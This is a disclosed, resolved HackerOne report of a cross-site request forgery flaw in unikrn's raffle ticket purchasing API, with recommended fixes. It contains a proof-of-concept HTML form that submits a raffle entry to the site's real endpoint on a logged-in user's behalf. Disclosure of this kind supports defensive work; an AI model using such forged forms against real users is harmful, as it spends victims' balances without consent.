CSRF in Raffles Ticket Purchasing

Disclosed: 2018-04-10 02:10:08 By tolo7010 To unikrn
High
Vulnerability Details
Description: ======== An API endpoint get executed with no CSRF prevention, the endpoint did not verify session_id required in the post form. An attacker can crafted malicious form (Poc), which is executed by authenticated user action leading to huge balance lost. Poc: === <!doctype html> <html> <head> </head> <body> <form action="https://unikrn.com/apiv2/raffle/enter" method="POST" name="myForm"> <input type="hidden" name="raffle" id="raffle" value="4775"> <input type="hidden" name="tickets" id="tickets" value="1"> <input type="hidden" name="session_id" id="session_id" value=""> <input value="Submit" type="submit""> </form> </body> </html> Recommendations: ============= - Implementing CSRF tokens. - Validate session_id on post form/JSON api input.
Actions
View on HackerOne
Report Stats
  • Report ID: 272588
  • State: Closed
  • Substate: resolved
  • Upvotes: 19
Share this report